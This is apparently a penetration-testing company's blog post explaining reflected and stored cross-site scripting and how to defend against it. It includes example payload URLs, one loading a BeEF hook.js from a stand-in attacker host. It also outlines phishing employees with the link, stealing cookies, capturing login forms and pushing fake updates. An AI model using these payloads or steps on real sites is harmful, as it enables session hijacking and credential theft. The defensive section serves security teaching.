As providers of penetration testing services, one of our key roles at SureCloud is to provide hazard risk management services to our clients – by highlighting areas that might be cultivating risk, identifying vulnerabilities, and then making plans for risk remediation. Cross-site scripting is just one of the cases that business need to be aware of when building their cybersecurity programme.
What is cross-site scripting?
Cross-Site Scripting (XSS) is an attack that causes malicious scripts to be executed in a user’s browser via a vulnerable application. It occurs due to the application not correctly validating or encoding input that a user provides. This allows dangerous characters to be entered, which is then returned in the response and executed, just as if it had come from the application itself. This normally involves tricking the user in to visiting a malicious page or clicking a malicious link. Cross-Site Scripting currently sites at number 3 on OWASP’s top 10 list.
There are three types of XSS, reflected, persistent and DOM-based. For this investigation, we’ll be focusing on reflected and persistent XSS.
Security professionals normally visualise this vulnerability by launching an alert pop up box; however, in reality XSS can be far more dangerous.
Detection of XSS
To conduct XSS, an attacker must find a vulnerable website. Automated scanners can be used to find XSS vulnerabilities by entering XSS payloads in to all user controlled data. The scanner will then monitor the response and ascertain if the payload was returned in full in the response, and if it was sanitised or encoded. If the payload is returned in full then it is likely vulnerable to XSS. This method causes a lot of traffic as several different payloads are entered in to all user controlled data.
Manual testing involves entering payloads strings and then tweaking in order to bypass sanitisation (if carried out). It can be more time consuming than automated scanning, however, is often less noticeable.
Reflected XSS
Reflected XSS is the least severe form of XSS. Reflected XSS normally involves sending a victim a malicious URL that will be returned in the response, causing the script to execute in their browser. In this example, the “id” parameter is vulnerable to XSS.
- thisisanexamplewebsite.com?id=<script>alert%281%29</script>
The script is only executed once unless the URL is visited several times (i.e by hitting the “back” button) and only in the context of the user who clicks it.
Stored XSS/ Persistent XSS
Stored XSS is significantly more dangerous and normally occurs on forums or group calendars within an application, where user input is stored on that page and can be viewed by all users. It represents a high risk as the attacker doesn’t need to send out any links, they simply enter the payload in to a vulnerable page. Any user that views this page would have the script executed in their browser and it would execute every time they visit.
What can an attacker actually do with XSS?
Depending on how skilled the attacker is, almost anything is possible with XSS. In this example, we will show how we can use XSS to gain control of the user’s session and underlying host.
STEP 1: Finding a vulnerable page
Using automated tools or manual testing, an attacker has found the vulnerable “ID” parameter on a company’s main web application.
- thisisanexamplewebsite.com?id=<script>alert%281%29</script>
STEP 2: Constructing the URL
Several different payloads can be sent via XSS. Some can redirect the user to a malicious page, some can steal cookies and send them to the attacker.
In this case, we will use the BEEF XSS Framework to exploit the XSS.
We know that the id parameter is vulnerable to XSS, so we enter the payload there.
- thisisanexamplewebsite.com?id=<script%20src=%22attackercontrolledswebsite.com/hook.js%22></script>
This payload will direct the application to the “hook.js” javascript file on the web server hosted on 127.0.0.1:3000. This javascript file will allow us to perform various actions in the user’s browser.
STEP 3: Sending the URL
The next step involves sending the malicious link to the victims. Company email addresses are readily found through online search engines or can be guessed from employee information if the general structure is known. (firstname.lastname@vulnerablesite.com) for example.
STEP 4: The Hook
Once we send out the link, the attacker has to wait for someone to click it. Once someone has, we should see their IP propagate to our instance of BEEF.
STEP 5: Exploitation of Web Application
Now that we have the browser hooked, we can launch a variety of exploits to compromise the session and underlying host.
Firstly, we can view the user’s cookies. This will only be possible if the application does not set the secure and HTTPOnly flags on all cookies. If these flags are not set it will likely be possible to impersonate the user’s session.
We can then set up a man-in-the-browser attack. This is where we route all traffic through our instance of BEEF. Using this is it possible to capture all interaction between the user and the application including submission of authentication forms.
It is also possible to load various fake popups in the user’s browser. These can be tailored to individual needs and can be used to get users to enter their authentication details.
STEP 6: Exploitation of the Underlying Host
BEEF contains several modules pertaining to gaining access to the user’s underlying host. These mainly involve fake flash updates or messages pretending to by update requests from your browser. These can be customised to point to an attacker-controlled executable. Once this is downloaded and run, which could set up a connection between the attacker and victim, the host would have full access.
Defense
Sanitise all user controllable (untrusted) data before it is inserted into the response body. Sanitisation must be appropriate for the location where the data is being inserted. For example:
- HTML body (e.g. <div>…HERE…</div>) – HTML entity encoding
- Safe HTML attributes (e.g. <input value=”…HERE…”>) – HTML entity encoding (attribute must also be quoted)
- Javascript (e.g. <script>someFunction(‘…HERE…’);</script>) – Javascript hex or unicode encoding (string variables must be quoted, others validated as their expected data type)
- CSS (e.g. <div style=”width: …HERE…;”>) – CSS hex encoding (also ensure URLs always start with ‘http’)
- URL GET parameter (e.g. <a href=”…HERE…”>) – URL encoding
Avoid inserting data into locations other than those above (for example: HTML comments). Other locations may require different forms and levels of sanitisation that must be very carefully considered.
If the untrusted data itself is HTML markup (and you therefore cannot do HTML entity encoding because the page needs to process the data as HTML), utilise a well-known and thoroughly tested HTML markup sanitiser. See the referenced OWASP article for suggestions.
In addition to the above, all user-controllable values should be appropriately validated against that which is expected (type, length, format, etc) upon input, before being reinserted into the page, or stored for later processing/return. This adds an additional layer of protection that will reduce the likelihood of many similar injection vulnerabilities.
Consider implementing a Content Security Policy to prevent resources (e.g. Javascript and CSS) from being loaded from unapproved domains.
What’s next?
At SureCloud, we specialise in making these sorts of attacks known to our clients. Our penetration testing services can assist in detecting vulnerabilities within your human and digital systems, to put you best-foot-forward in improving your security plans. To kickstart your hazard risk management transformation, take a look at our cybersecurity offerings.